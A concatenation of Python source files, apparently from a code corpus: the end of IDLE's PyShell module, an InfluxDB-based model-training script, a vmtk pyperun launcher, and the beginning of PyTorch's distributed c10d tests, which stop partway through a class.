    def short_title(self):
        return self.shell_title

    COPYRIGHT = \
          'Type "copyright", "credits" or "license()" for more information.'

    def begin(self):
        """Show the banner and first prompt; start the subprocess if used.

        Returns False (after closing the window) if the subprocess could
        not be started, True otherwise.
        """
        self.resetoutput()
        if use_subprocess:
            nosub = ''
            client = self.interp.start_subprocess()
            if not client:
                self.close()
                return False
        else:
            nosub = "==== No Subprocess ===="
        self.write("Python %s on %s\n%s\n%s" %
                   (sys.version, sys.platform, self.COPYRIGHT, nosub))
        self.text.focus_force()
        self.showprompt()
        import Tkinter
        Tkinter._default_root = None # 03Jan04 KBK What's this?
        return True

    def stop_readline(self):
        if not self.reading:  # no nested mainloop to exit.
            return
        self._stop_readline_flag = True
        self.top.quit()

    def readline(self):
        """Block in a nested mainloop until the user submits a line."""
        save = self.reading
        try:
            self.reading = 1
            self.top.mainloop()  # nested mainloop()
        finally:
            self.reading = save
        if self._stop_readline_flag:
            self._stop_readline_flag = False
            return ""
        line = self.text.get("iomark", "end-1c")
        if len(line) == 0:  # may be EOF if we quit our mainloop with Ctrl-C
            line = "\n"
        if isinstance(line, unicode):
            from idlelib import IOBinding
            try:
                line = line.encode(IOBinding.encoding)
            except UnicodeError:
                pass
        self.resetoutput()
        if self.canceled:
            self.canceled = 0
            if not use_subprocess:
                raise KeyboardInterrupt
        if self.endoffile:
            self.endoffile = 0
            line = ""
        return line

    def isatty(self):
        return True

    def cancel_callback(self, event=None):
        """Handle Ctrl-C: interrupt running code or cancel pending input."""
        try:
            if self.text.compare("sel.first", "!=", "sel.last"):
                return # Active selection -- always use default binding
        except:
            pass
        if not (self.executing or self.reading):
            self.resetoutput()
            self.interp.write("KeyboardInterrupt\n")
            self.showprompt()
            return "break"
        self.endoffile = 0
        self.canceled = 1
        if (self.executing and self.interp.rpcclt):
            if self.interp.getdebugger():
                self.interp.restart_subprocess()
            else:
                self.interp.interrupt_subprocess()
        if self.reading:
            self.top.quit()  # exit the nested mainloop() in readline()
        return "break"

    def eof_callback(self, event):
        """Handle Ctrl-D/Ctrl-Z: close the shell or end a readline()."""
        if self.executing and not self.reading:
            return # Let the default binding (delete next char) take over
        if not (self.text.compare("iomark", "==", "insert") and
                self.text.compare("insert", "==", "end-1c")):
            return # Let the default binding (delete next char) take over
        if not self.executing:
            self.resetoutput()
            self.close()
        else:
            self.canceled = 0
            self.endoffile = 1
            self.top.quit()
        return "break"

    def linefeed_callback(self, event):
        # Insert a linefeed without entering anything (still autoindented)
        if self.reading:
            self.text.insert("insert", "\n")
            self.text.see("insert")
        else:
            self.newline_and_indent_event(event)
        return "break"

    def enter_callback(self, event):
        """Handle Return: recall old input, continue editing, or submit."""
        if self.executing and not self.reading:
            return # Let the default binding (insert '\n') take over
        # If some text is selected, recall the selection
        # (but only if this before the I/O mark)
        try:
            sel = self.text.get("sel.first", "sel.last")
            if sel:
                if self.text.compare("sel.last", "<=", "iomark"):
                    self.recall(sel, event)
                    return "break"
        except:
            pass
        # If we're strictly before the line containing iomark, recall
        # the current line, less a leading prompt, less leading or
        # trailing whitespace
        if self.text.compare("insert", "<", "iomark linestart"):
            # Check if there's a relevant stdin range -- if so, use it
            prev = self.text.tag_prevrange("stdin", "insert")
            if prev and self.text.compare("insert", "<", prev[1]):
                self.recall(self.text.get(prev[0], prev[1]), event)
                return "break"
            next = self.text.tag_nextrange("stdin", "insert")
            if next and self.text.compare("insert lineend", ">=", next[0]):
                self.recall(self.text.get(next[0], next[1]), event)
                return "break"
            # No stdin mark -- just get the current line, less any prompt
            indices = self.text.tag_nextrange("console", "insert linestart")
            if indices and \
               self.text.compare(indices[0], "<=", "insert linestart"):
                self.recall(self.text.get(indices[1], "insert lineend"), event)
            else:
                self.recall(self.text.get("insert linestart", "insert lineend"), event)
            return "break"
        # If we're between the beginning of the line and the iomark, i.e.
        # in the prompt area, move to the end of the prompt
        if self.text.compare("insert", "<", "iomark"):
            self.text.mark_set("insert", "iomark")
        # If we're in the current input and there's only whitespace
        # beyond the cursor, erase that whitespace first
        s = self.text.get("insert", "end-1c")
        if s and not s.strip():
            self.text.delete("insert", "end-1c")
        # If we're in the current input before its last line,
        # insert a newline right at the insert point
        if self.text.compare("insert", "<", "end-1c linestart"):
            self.newline_and_indent_event(event)
            return "break"
        # We're in the last line; append a newline and submit it
        self.text.mark_set("insert", "end-1c")
        if self.reading:
            self.text.insert("insert", "\n")
            self.text.see("insert")
        else:
            self.newline_and_indent_event(event)
        self.text.tag_add("stdin", "iomark", "end-1c")
        self.text.update_idletasks()
        if self.reading:
            self.top.quit()  # Break out of recursive mainloop() in raw_input()
        else:
            self.runit()
        return "break"

    def recall(self, s, event):
        """Copy old input `s` to the current input area, re-indenting it."""
        # remove leading and trailing empty or whitespace lines
        s = re.sub(r'^\s*\n', '' , s)
        s = re.sub(r'\n\s*$', '', s)
        lines = s.split('\n')
        self.text.undo_block_start()
        try:
            self.text.tag_remove("sel", "1.0", "end")
            self.text.mark_set("insert", "end-1c")
            prefix = self.text.get("insert linestart", "insert")
            if prefix.rstrip().endswith(':'):
                self.newline_and_indent_event(event)
                prefix = self.text.get("insert linestart", "insert")
            self.text.insert("insert", lines[0].strip())
            if len(lines) > 1:
                orig_base_indent = re.search(r'^([ \t]*)', lines[0]).group(0)
                new_base_indent = re.search(r'^([ \t]*)', prefix).group(0)
                for line in lines[1:]:
                    if line.startswith(orig_base_indent):
                        # replace orig base indentation with new indentation
                        line = new_base_indent + line[len(orig_base_indent):]
                    self.text.insert('insert', '\n'+line.rstrip())
        finally:
            self.text.see("insert")
            self.text.undo_block_stop()

    def runit(self):
        """Submit the current input region to the interpreter."""
        line = self.text.get("iomark", "end-1c")
        # Strip off last newline and surrounding whitespace.
        # (To allow you to hit return twice to end a statement.)
        i = len(line)
        while i > 0 and line[i-1] in " \t":
            i = i-1
        if i > 0 and line[i-1] == "\n":
            i = i-1
        while i > 0 and line[i-1] in " \t":
            i = i-1
        line = line[:i]
        self.interp.runsource(line)

    def open_stack_viewer(self, event=None):
        if self.interp.rpcclt:
            return self.interp.remote_stack_viewer()
        try:
            sys.last_traceback
        except:
            tkMessageBox.showerror("No stack trace",
                "There is no stack trace yet.\n"
                "(sys.last_traceback is not defined)",
                parent=self.text)
            return
        from idlelib.StackViewer import StackBrowser
        StackBrowser(self.root, self.flist)

    def view_restart_mark(self, event=None):
        self.text.see("iomark")
        self.text.see("restart")

    def restart_shell(self, event=None):
        "Callback for Run/Restart Shell Cntl-F6"
        self.interp.restart_subprocess(with_cwd=True)

    def showprompt(self):
        """Write sys.ps1 and position the insert cursor after it."""
        self.resetoutput()
        try:
            s = str(sys.ps1)
        except:
            s = ""
        self.console.write(s)
        self.text.mark_set("insert", "end-1c")
        self.set_line_and_column()
        self.io.reset_undo()

    def resetoutput(self):
        """Store the last input in history and advance the I/O mark."""
        source = self.text.get("iomark", "end-1c")
        if self.history:
            self.history.store(source)
        if self.text.get("end-2c") != "\n":
            self.text.insert("end-1c", "\n")
        self.text.mark_set("iomark", "end-1c")
        self.set_line_and_column()
        sys.stdout.softspace = 0

    def write(self, s, tags=()):
        """Write output before the I/O mark, keeping the mark after it."""
        try:
            # Temporarily flip the mark's gravity so it ends up after `s`.
            self.text.mark_gravity("iomark", "right")
            OutputWindow.write(self, s, tags, "iomark")
            self.text.mark_gravity("iomark", "left")
        except:
            pass
        if self.canceled:
            self.canceled = 0
            if not use_subprocess:
                raise KeyboardInterrupt

    def rmenu_check_cut(self):
        # Cutting read-only output (before "iomark") is not allowed.
        try:
            if self.text.compare('sel.first', '<', 'iomark'):
                return 'disabled'
        except TclError: # no selection, so the index 'sel.first' doesn't exist
            return 'disabled'
        return super(PyShell, self).rmenu_check_cut()

    def rmenu_check_paste(self):
        # Pasting into the read-only region is not allowed.
        if self.text.compare('insert', '<', 'iomark'):
            return 'disabled'
        return super(PyShell, self).rmenu_check_paste()
class PseudoFile(io.TextIOBase):
    """Base for file-like objects that route text through a shell window."""

    def __init__(self, shell, tags, encoding=None):
        self._encoding = encoding
        self.softspace = 0   # kept for the Python 2 print statement protocol
        self.tags = tags     # text-widget tag applied to this stream's text
        self.shell = shell   # shell window that renders or supplies the text

    @property
    def encoding(self):
        """Encoding advertised to clients; fixed at construction time."""
        return self._encoding

    @property
    def name(self):
        """Synthetic stream name such as '<stdout>', derived from the tag."""
        return '<{}>'.format(self.tags)

    def isatty(self):
        """Claim to be a terminal so prompting code behaves interactively."""
        return True
class PseudoOutputFile(PseudoFile):
    """Writable pseudo-file: text written here appears in the shell window."""

    def writable(self):
        return True

    def write(self, s):
        """Write `s` to the shell window, tagged with this stream's tag."""
        if self.closed:
            raise ValueError("write to closed file")
        if type(s) not in (unicode, str, bytearray):
            # See issue #19481
            # Coerce str/unicode/bytearray *subclasses* down to plain
            # instances before handing the text to Tk.
            if isinstance(s, unicode):
                s = unicode.__getitem__(s, slice(None))
            elif isinstance(s, str):
                s = str.__str__(s)
            elif isinstance(s, bytearray):
                s = bytearray.__str__(s)
            else:
                raise TypeError('must be string, not ' + type(s).__name__)
        return self.shell.write(s, self.tags)
class PseudoInputFile(PseudoFile):
    """Readable pseudo-file: reads lines typed into the shell window."""

    def __init__(self, shell, tags, encoding=None):
        PseudoFile.__init__(self, shell, tags, encoding)
        # Holds text already fetched from the shell but not yet consumed
        # by read()/readline() size limits.
        self._line_buffer = ''

    def readable(self):
        return True

    def read(self, size=-1):
        """Read up to `size` characters (all input if size < 0)."""
        if self.closed:
            raise ValueError("read from closed file")
        if size is None:
            size = -1
        elif not isinstance(size, (int, long)):
            raise TypeError('must be int, not ' + type(size).__name__)
        result = self._line_buffer
        self._line_buffer = ''
        if size < 0:
            # Read until the shell signals EOF with an empty line.
            while True:
                line = self.shell.readline()
                if not line: break
                result += line
        else:
            while len(result) < size:
                line = self.shell.readline()
                if not line: break
                result += line
            # Keep any overshoot for the next read.
            self._line_buffer = result[size:]
            result = result[:size]
        return result

    def readline(self, size=-1):
        """Read one line, or at most `size` characters of it."""
        if self.closed:
            raise ValueError("read from closed file")
        if size is None:
            size = -1
        elif not isinstance(size, (int, long)):
            raise TypeError('must be int, not ' + type(size).__name__)
        line = self._line_buffer or self.shell.readline()
        if size < 0:
            size = len(line)
        eol = line.find('\n', 0, size)
        if eol >= 0:
            # Stop just past the newline; buffer the remainder.
            size = eol + 1
        self._line_buffer = line[size:]
        return line[:size]

    def close(self):
        # Closing stdin closes the whole shell window.
        self.shell.close()
def fix_x11_paste(root):
    "Make paste replace selection on x11.  See issue #5124."
    if root._windowingsystem == 'x11':
        for cls in 'Text', 'Entry', 'Spinbox':
            # Prepend a Tcl script that deletes the current selection
            # (ignoring errors when there is none) to the existing
            # class-level <<Paste>> binding.
            root.bind_class(
                cls,
                '<<Paste>>',
                'catch {%W delete sel.first sel.last}\n' +
                root.bind_class(cls, '<<Paste>>'))
usage_msg = """\
USAGE: idle [-deins] [-t title] [file]*
idle [-dns] [-t title] (-c cmd | -r file) [arg]*
idle [-dns] [-t title] - [arg]*
-h print this help message and exit
-n run IDLE without a subprocess (see Help/IDLE Help for details)
The following options will override the IDLE 'settings' configuration:
-e open an edit window
-i open a shell window
The following options imply -i and will open a shell:
-c cmd run the command in a shell, or
-r file run script from file
-d enable the debugger
-s run $IDLESTARTUP or $PYTHONSTARTUP before anything else
-t title set title of shell window
A default edit window will be bypassed when -c, -r, or - are used.
[arg]* are passed to the command (-c) or script (-r) in sys.argv[1:].
Examples:
idle
Open an edit window or shell depending on IDLE's configuration.
idle foo.py foobar.py
Edit the files, also open a shell if configured to start with shell.
idle -est "Baz" foo.py
Run $IDLESTARTUP or $PYTHONSTARTUP, edit foo.py, and open a shell
window with the title "Baz".
idle -c "import sys; print sys.argv" "foo"
Open a shell window and run the command, passing "-c" in sys.argv[0]
and "foo" in sys.argv[1].
idle -d -s -r foo.py "Hello World"
Open a shell window, run a startup script, enable the debugger, and
run foo.py, passing "foo.py" in sys.argv[0] and "Hello World" in
sys.argv[1].
echo "import sys; print sys.argv" | idle - "foobar"
Open a shell window, run the script piped in, passing '' in sys.argv[0]
and "foobar" in sys.argv[1].
"""
def main():
    """IDLE's command-line entry point.

    Parses the options documented in usage_msg (-c cmd, -d, -e, -h, -i,
    -n, -r file, -s, -t title, and '-' for a script on stdin), sets the
    module globals flist, root and use_subprocess, builds the Tk root,
    opens editor and/or shell windows as requested, and runs the Tk
    mainloop until all windows are closed.
    """
    global flist, root, use_subprocess
    capture_warnings(True)
    use_subprocess = True
    enable_shell = False
    enable_edit = False
    debug = False
    cmd = None
    script = None
    startup = False
    try:
        opts, args = getopt.getopt(sys.argv[1:], "c:deihnr:st:")
    except getopt.error as msg:
        print("Error: %s\n%s" % (msg, usage_msg), file=sys.stderr)
        sys.exit(2)
    for o, a in opts:
        if o == '-c':
            cmd = a
            enable_shell = True
        if o == '-d':
            debug = True
            enable_shell = True
        if o == '-e':
            enable_edit = True
        if o == '-h':
            sys.stdout.write(usage_msg)
            sys.exit()
        if o == '-i':
            enable_shell = True
        if o == '-n':
            use_subprocess = False
        if o == '-r':
            script = a
            # Fixed: original used "if os.path.isfile(script): pass / else:"
            # — an inverted-condition anti-pattern with an empty success
            # branch.  Test the failure case directly instead.
            if not os.path.isfile(script):
                print("No script file: ", script, file=sys.stderr)
                sys.exit()
            enable_shell = True
        if o == '-s':
            startup = True
            enable_shell = True
        if o == '-t':
            PyShell.shell_title = a
            enable_shell = True
    if args and args[0] == '-':
        # '-' means: read the script to run from standard input.
        cmd = sys.stdin.read()
        enable_shell = True
    # process sys.argv and sys.path:
    for i in range(len(sys.path)):
        sys.path[i] = os.path.abspath(sys.path[i])
    if args and args[0] == '-':
        sys.argv = [''] + args[1:]
    elif cmd:
        sys.argv = ['-c'] + args
    elif script:
        sys.argv = [script] + args
    elif args:
        enable_edit = True
        pathx = []
        for filename in args:
            pathx.append(os.path.dirname(filename))
        for dir in pathx:
            dir = os.path.abspath(dir)
            if dir not in sys.path:
                sys.path.insert(0, dir)
    else:
        dir = os.getcwd()
        # Idiom fix: 'not dir in sys.path' -> 'dir not in sys.path'
        # (identical behavior, PEP 8 preferred spelling).
        if dir not in sys.path:
            sys.path.insert(0, dir)
    # check the IDLE settings configuration (but command line overrides)
    edit_start = idleConf.GetOption('main', 'General',
                                    'editor-on-startup', type='bool')
    enable_edit = enable_edit or edit_start
    enable_shell = enable_shell or not enable_edit
    # start editor and/or shell windows:
    root = Tk(className="Idle")
    root.withdraw()
    # set application icon
    icondir = os.path.join(os.path.dirname(__file__), 'Icons')
    if system() == 'Windows':
        iconfile = os.path.join(icondir, 'idle.ico')
        root.wm_iconbitmap(default=iconfile)
    elif TkVersion >= 8.5:
        # Tk 8.6 supports PNG natively; older 8.5 falls back to GIF.
        ext = '.png' if TkVersion >= 8.6 else '.gif'
        iconfiles = [os.path.join(icondir, 'idle_%d%s' % (size, ext))
                     for size in (16, 32, 48)]
        icons = [PhotoImage(file=iconfile) for iconfile in iconfiles]
        root.tk.call('wm', 'iconphoto', str(root), "-default", *icons)
    fixwordbreaks(root)
    fix_x11_paste(root)
    flist = PyShellFileList(root)
    macosxSupport.setupApp(root, flist)
    if macosxSupport.isAquaTk():
        # There are some screwed up <2> class bindings for text
        # widgets defined in Tk which we need to do away with.
        # See issue #24801.
        root.unbind_class('Text', '<B2>')
        root.unbind_class('Text', '<B2-Motion>')
        root.unbind_class('Text', '<<PasteSelection>>')
    if enable_edit:
        if not (cmd or script):
            for filename in args[:]:
                if flist.open(filename) is None:
                    # filename is a directory actually, disconsider it
                    args.remove(filename)
            if not args:
                flist.new()
    if enable_shell:
        shell = flist.open_shell()
        if not shell:
            return  # couldn't open shell
        if macosxSupport.isAquaTk() and flist.dict:
            # On OSX: when the user has double-clicked on a file that causes
            # IDLE to be launched the shell window will open just in front of
            # the file she wants to see. Lower the interpreter window when
            # there are open files.
            shell.top.lower()
    else:
        shell = flist.pyshell
    # Handle remaining options. If any of these are set, enable_shell
    # was set also, so shell must be true to reach here.
    if debug:
        shell.open_debugger()
    if startup:
        filename = os.environ.get("IDLESTARTUP") or \
                   os.environ.get("PYTHONSTARTUP")
        if filename and os.path.isfile(filename):
            shell.interp.execfile(filename)
    if cmd or script:
        # Install the user-visible sys.argv inside the subprocess before
        # running the command/script.
        shell.interp.runcommand("""if 1:
            import sys as _sys
            _sys.argv = %r
            del _sys
            \n""" % (sys.argv,))
        if cmd:
            shell.interp.execsource(cmd)
        elif script:
            shell.interp.prepend_syspath(script)
            shell.interp.execfile(script)
    elif shell:
        # If there is a shell window and no cmd or script in progress,
        # check for problematic OS X Tk versions and print a warning
        # message in the IDLE shell window; this is less intrusive
        # than always opening a separate window.
        tkversionwarning = macosxSupport.tkVersionWarning(root)
        if tkversionwarning:
            shell.interp.runcommand("print('%s')" % tkversionwarning)
    while flist.inversedict:  # keep IDLE running while files are open.
        root.mainloop()
    root.destroy()
    capture_warnings(False)
if __name__ == "__main__":
    # Alias the running module as 'PyShell' so that code doing
    # 'import PyShell' gets this very module object instead of a copy.
    sys.modules['PyShell'] = sys.modules['__main__']
    main()
capture_warnings(False)  # Make sure turned off; see issue 18081
|
final_model_creator.py | import json
import logging
import os
import sys
import argparse
import urllib3
from influxdb import InfluxDBClient
from multiprocessing import Process
from classes.artificial_features import ArtificialFeatures
from classes.features_analyzer import FeaturesAnalyzer
from classes.inputs_gatherer import InputsGatherer
from classes.model_trainer import ModelTrainer
import warnings
warnings.filterwarnings("ignore")
urllib3.disable_warnings()
# --------------------------------------------------------------------------- #
# Functions
# --------------------------------------------------------------------------- #
def mt_process(ig, k_region, target, cfg, logger):
    """Train the final model(s) for a single (region, target) pair.

    Intended to run as the body of a multiprocessing.Process (see the
    __main__ block below, which starts one process per region/target).

    NOTE(review): this relies on the module-global `forecast_type` that is
    assigned in the __main__ block; with a 'spawn' start method the global
    would not be inherited by the child — confirm the start method is fork.
    """
    fa = FeaturesAnalyzer(ig, forecast_type, cfg, logger)
    # Read the dataset restricted to this region and a single target signal.
    fa.dataset_reader(k_region, [target])
    mt = ModelTrainer(fa, ig, forecast_type, cfg, logger)
    mt.train_final_models(k_region, target)
if __name__ == "__main__":
    # --------------------------------------------------------------------------- #
    # Configuration file
    # --------------------------------------------------------------------------- #
    arg_parser = argparse.ArgumentParser()
    arg_parser.add_argument("-c", help="configuration file")
    arg_parser.add_argument("-t", help="type (MOR | EVE)")
    arg_parser.add_argument("-l", help="log file (optional, if empty log redirected on stdout)")
    args = arg_parser.parse_args()

    # Load the main parameters
    config_file = args.c
    if os.path.isfile(config_file) is False:
        print('\nATTENTION! Unable to open configuration file %s\n' % config_file)
        sys.exit(1)

    cfg = json.loads(open(args.c).read())

    # Load the connections parameters and update the config dict with the related values
    cfg_conns = json.loads(open(cfg['connectionsFile']).read())
    cfg.update(cfg_conns)

    # Define the forecast type (read by mt_process via the module global)
    forecast_type = args.t

    # --------------------------------------------------------------------------- #
    # Set logging object
    # --------------------------------------------------------------------------- #
    if not args.l:
        log_file = None
    else:
        log_file = args.l

    logger = logging.getLogger()
    logging.basicConfig(format='%(asctime)-15s::%(levelname)s::%(funcName)s::%(message)s', level=logging.INFO,
                        filename=log_file)

    logger.info('Starting program')

    logger.info('Connection to InfluxDb server on socket [%s:%s]' % (cfg['influxDB']['host'], cfg['influxDB']['port']))
    try:
        influx_client = InfluxDBClient(host=cfg['influxDB']['host'], port=cfg['influxDB']['port'],
                                       password=cfg['influxDB']['password'], username=cfg['influxDB']['user'],
                                       database=cfg['influxDB']['database'], ssl=cfg['influxDB']['ssl'])
    except Exception as e:
        logger.error('EXCEPTION: %s' % str(e))
        sys.exit(3)
    logger.info('Connection successful')

    af = ArtificialFeatures(influx_client, forecast_type, cfg, logger)
    ig = InputsGatherer(influx_client, forecast_type, cfg, logger, af)

    procs = []
    # Cycle over the regions: one training process per (region, target) pair,
    # all started in parallel and then joined.
    for k_region in cfg['regions'].keys():
        for target in cfg['regions'][k_region]['finalModelCreator']['targets'].keys():
            tmp_proc = Process(target=mt_process, args=[ig, k_region, target, cfg, logger])
            tmp_proc.start()
            procs.append(tmp_proc)

    for proc in procs:
        proc.join()

    logger.info('Ending program')
|
pyperun.py | #!${PYTHON_SHEBANG}
## Program: PypeS
## Module: $RCSfile: pype.py,v $
## Language: Python
## Date: $Date: 2006/07/07 10:45:42 $
## Version: $Revision: 1.18 $
## Copyright (c) Luca Antiga, David Steinman. All rights reserved.
## See LICENCE file for details.
## This software is distributed WITHOUT ANY WARRANTY; without even
## the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR
## PURPOSE. See the above copyright notices for more information.
import sys
from multiprocessing import Process, Manager
# Import the pype server machinery (Python 2 syntax throughout this file).
# On any import failure, print a short diagnostic and re-raise so the full
# traceback is still shown.
try:
    from vmtk import pypeserver
    from vmtk import pypes
except:
    print "Unexpected error:", sys.exc_info()[0]
    raise
if __name__=='__main__':
    # Shared job queue, served by a background PypeServer process.
    manager = Manager()
    queue = manager.list()
    # returnIfEmptyQueue makes the server exit once the queue is drained.
    pypeProcess = Process(target=pypeserver.PypeServer, args=(queue,None,None), kwargs={"returnIfEmptyQueue":True})
    pypeProcess.start()
    args = sys.argv[:]
    # When invoked via the 'pyperun' wrapper script, drop the script name
    # itself so only the pype arguments are enqueued.
    if sys.argv[0].startswith('pyperun'):
        args = sys.argv[1:]
    queue.append(args)
    try:
        pypeProcess.join()
    except KeyboardInterrupt:
        # Ctrl-C: stop the server process instead of leaving it orphaned.
        pypeProcess.terminate()
    except BaseException, e:
        print e
|
test_c10d_common.py | # Owner(s): ["oncall: distributed"]
import copy
import os
import sys
import tempfile
import threading
import time
from datetime import timedelta
from itertools import product
from sys import platform
import torch
import torch.distributed as dist
# Skip the whole module when this torch build has no distributed support.
if not dist.is_available():
    print("distributed package not available, skipping tests", file=sys.stderr)
    sys.exit(0)
import torch.distributed.distributed_c10d as c10d
import torch.distributed.algorithms.ddp_comm_hooks.powerSGD_hook as powerSGD
import torch.nn.functional as F
import torch.testing._internal.common_utils as common
from torch import nn
from torch.nn.parallel import DistributedDataParallel
from torch.testing._internal.common_distributed import (
MultiProcessTestCase,
)
from torch.testing._internal.common_utils import (
TestCase,
load_tests,
run_tests,
TEST_WITH_DEV_DBG_ASAN,
)
# Spawned subprocesses do not work under dev/dbg ASAN builds; skip entirely.
if TEST_WITH_DEV_DBG_ASAN:
    print("Multiprocessing spawn is not compatible with dev/dbg asan", file=sys.stderr)
    sys.exit(0)

# load_tests from common_utils is used to automatically filter tests for
# sharding on sandcastle. This line silences flake warnings
load_tests = load_tests

# Loopback interface name differs between macOS and Linux.
if platform == "darwin":
    LOOPBACK = "lo0"
else:
    LOOPBACK = "lo"

# Disable TF32 so matmul results are bitwise comparable across ranks.
torch.backends.cuda.matmul.allow_tf32 = False
def gpus_for_rank(world_size):
    """Multigpu tests are designed to simulate the multi nodes with multi
    GPUs on each node. Nccl backend requires equal #GPUs in each process.
    On a single node, all visible GPUs are evenly
    divided to subsets, each process only uses a subset.
    """
    device_count = torch.cuda.device_count()
    visible_devices = list(range(device_count))
    per_process = device_count // world_size
    # One contiguous slice of the visible devices per rank.
    return [
        visible_devices[rank * per_process:(rank + 1) * per_process]
        for rank in range(world_size)
    ]
class AbstractTimeoutTest(object):
    # Mixin verifying that the default store honors the process-group timeout.
    def _test_store_timeout(self, backend, init_method, c2p):
        # Runs in a worker thread; reports either the elapsed wait time or
        # the RuntimeError back to the main thread through the c2p list.
        try:
            dist.init_process_group(
                backend=backend,
                init_method=init_method,
                world_size=1,
                rank=0,
                timeout=timedelta(seconds=1),
            )
            default_store = c10d._get_default_store()
            tik = time.time()
            with self.assertRaisesRegex(RuntimeError, "Timeout"):
                default_store.get("nonexistent key")
            tok = time.time()
            dist.destroy_process_group()
            c2p.append(float(tok - tik))
        except RuntimeError as e:
            # catch "Address already in use" error and report it to the main
            # thread
            c2p.append(e)

    def _init_methods(self):
        # Yield both a file:// and a tcp:// rendezvous URL for this platform.
        f = tempfile.NamedTemporaryFile(delete=False)
        if sys.platform == "win32":
            yield "file:///%s" % f.name.replace("\\", "/")
            f.close()
        else:
            yield "file://%s" % f.name
            f.close()
        yield "tcp://127.0.0.1:%d" % common.find_free_port()

    def _test_default_store_timeout(self, backend):
        for init_method in self._init_methods():
            c2p = []
            t = threading.Thread(
                target=self._test_store_timeout, args=(backend, init_method, c2p)
            )
            t.daemon = True
            t.start()
            t.join(5)

            self.assertEqual(1, len(c2p))
            if isinstance(c2p[0], float):
                # waiting time should be 1s, use 3s to rule out false alarm
                self.assertGreater(3, c2p[0])
            elif isinstance(c2p[0], RuntimeError):
                # let @retry_on_connect_failures handle the error
                raise c2p[0]
            else:
                raise RuntimeError("Unexpected type {}".format(type(c2p[0])))
class Net(nn.Module):
    """Small bias-free MLP (2 -> 10 -> 50 -> 4) with a softmax output,
    used as the reference model in DDP parity tests."""

    def __init__(self):
        super(Net, self).__init__()
        self.fc1 = nn.Linear(2, 10, bias=False)
        self.fc2 = nn.Linear(10, 50, bias=False)
        self.fc3 = nn.Linear(50, 4, bias=False)
        self.relu = nn.ReLU()

    def forward(self, x):
        hidden = self.relu(self.fc1(x))
        hidden = self.relu(self.fc2(hidden))
        return F.softmax(self.fc3(hidden), dim=1)
class DoubleGpuNet(nn.Module):
    """Variant of Net whose layers are split across two devices
    (gpus[0] and gpus[1]) to exercise multi-device DDP handling."""

    def __init__(self, gpus):
        super(DoubleGpuNet, self).__init__()
        self.fc1 = nn.Linear(2, 10, bias=False).to(gpus[0])
        self.fc2 = nn.Linear(10, 50, bias=False).to(gpus[1])
        self.fc3 = nn.Linear(50, 4, bias=False).to(gpus[1])
        self.relu = nn.ReLU()
        # Frozen (requires_grad=False) parameter exercises DDP's handling of
        # parameters that never receive gradients.
        self.no_grad_param = nn.Parameter(
            torch.tensor([2, 2]).long(), requires_grad=False
        ).to(gpus[0])

    def forward(self, x):
        first_dev = self.fc1.weight.device
        second_dev = self.fc2.weight.device
        out = self.relu(self.fc1(x.to(first_dev)))
        out = self.relu(self.fc2(out.to(second_dev)))
        out = self.fc3(out)
        # Return the result on the first device, softmax over classes.
        return F.softmax(out, dim=1).to(first_dev)
class QuadraGpuNet(nn.Module):
    """Variant of Net spread across four devices (one linear layer each)."""

    def __init__(self, gpus):
        super(QuadraGpuNet, self).__init__()
        self.fc1 = nn.Linear(2, 10, bias=False).to(gpus[0])
        self.fc2 = nn.Linear(10, 50, bias=False).to(gpus[1])
        self.fc3 = nn.Linear(50, 4, bias=False).to(gpus[2])
        self.fc4 = nn.Linear(4, 4, bias=False).to(gpus[3])
        self.relu = nn.ReLU()
        # Frozen (requires_grad=False) parameter exercises DDP's handling of
        # parameters that never receive gradients.
        self.no_grad_param = nn.Parameter(
            torch.tensor([2, 2]).long(), requires_grad=False
        ).to(gpus[0])

    def forward(self, x):
        # Chase the weights from device to device, stage by stage; ReLU is
        # applied after every layer except the last.
        stages = (self.fc1, self.fc2, self.fc3, self.fc4)
        out = x
        for index, layer in enumerate(stages):
            out = layer(out.to(layer.weight.device))
            if index < len(stages) - 1:
                out = self.relu(out)
        return F.softmax(out, dim=1).to(stages[0].weight.device)
class ConvNet(nn.Module):
    """Four-stage conv stack whose per-layer device, memory format and dtype
    are all configurable — used to check DDP replication placement."""

    def __init__(self, gpus, layouts, dtypes):
        super(ConvNet, self).__init__()
        self.dtypes = dtypes
        if isinstance(gpus, list):
            # Remember the explicit placement so forward() can route by it.
            self.layer_gpus = gpus
        else:
            gpus = [gpus] * 4
        # Build conv0..conv3 with their configured device/layout/dtype.
        channel_plan = [(8, 16), (16, 32), (32, 16), (16, 8)]
        for idx, (c_in, c_out) in enumerate(channel_plan):
            layer = torch.nn.Conv2d(c_in, c_out, (2, 2)).to(
                device=gpus[idx], memory_format=layouts[idx], dtype=dtypes[idx]
            )
            setattr(self, "conv%d" % idx, layer)

    def forward(self, x):
        x = x.to(self.dtypes[0])
        # Could say
        # x = self.conv0(x).to(device=self.conv1.weight.device, dtype=self.dtypes[1])
        # etc. But I don't want to appeal to the weights' devices directly, because part of this test's purpose
        # is to verify weights are where expected if the model gets replicated.
        gpus = self.layer_gpus if hasattr(self, "layer_gpus") else [x.device] * 4
        for idx in (0, 1, 2):
            layer = getattr(self, "conv%d" % idx)
            x = layer(x).to(device=gpus[idx + 1], dtype=self.dtypes[idx + 1])
        return self.conv3(x)
class Task(nn.Module):
    """Minimal module: a single 2x2 all-ones parameter added to the input."""

    def __init__(self):
        super().__init__()
        self.p = nn.Parameter(torch.ones(2, 2))

    def forward(self, x):
        return x + self.p
class ModuleForDdpCommHook(nn.Module):
    """Wraps a single Task; shifts the input by the caller's rank so each
    DDP worker produces a distinct, predictable gradient."""

    def __init__(self):
        super().__init__()
        self.t0 = Task()

    def forward(self, x, rank):
        shifted = x + rank
        return self.t0(shifted)
class SparseGradientModule(nn.Module):
    """Module whose backward produces sparse gradients (EmbeddingBag with
    sparse=True), used to test DDP's sparse-gradient path."""

    def __init__(self):
        super(SparseGradientModule, self).__init__()
        self.embedding = nn.EmbeddingBag(10, 10, sparse=True)

    def forward(self, x):
        pooled = self.embedding(x)
        return F.softmax(pooled, dim=1)
class AbstractDistributedDataParallelTest(object):
    # Mixin with DDP test helpers; concrete subclasses combine it with
    # MultiProcessTestCase, which provides self.rank and self.file_name.
    def tearDown(self):
        # DistributedDataParallel test doesn't seem to call FileStore destructor
        # TODO: investigate this test and the test is known to have issues
        # Use this hack to remove files for that test
        try:
            os.remove(self.file_name)
        except OSError:
            pass

    @property
    def world_size(self):
        # Number of participating processes for these tests.
        return 2

    def _prepare_single_device_module(
        self,
        process_group,
        devices,
        device_ids,
        global_batch_size,
        gradient_as_bucket_view=False,
